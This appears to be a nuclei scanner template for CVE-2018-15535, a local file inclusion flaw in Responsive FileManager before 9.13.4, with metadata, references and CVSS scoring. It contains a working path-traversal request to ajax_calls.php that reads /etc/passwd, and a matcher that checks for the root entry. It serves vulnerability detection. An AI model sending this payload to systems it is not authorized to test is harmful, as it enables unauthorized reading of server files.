nuclei-templates/cves/2018/CVE-2018-15535.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2021-09-09 12:48:08 +00:00
id: CVE-2018-15535
info:
name: Responsive FileManager <9.13.4 - Local File Inclusion
2021-09-09 12:48:08 +00:00
author: daffainfo
severity: high
description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
2021-09-09 12:48:08 +00:00
reference:
- https://www.exploit-db.com/exploits/45271
- https://nvd.nist.gov/vuln/detail/CVE-2018-15535
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22
tags: cve,cve2018,lfi
2021-09-09 12:48:08 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-09-09 12:48:08 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/08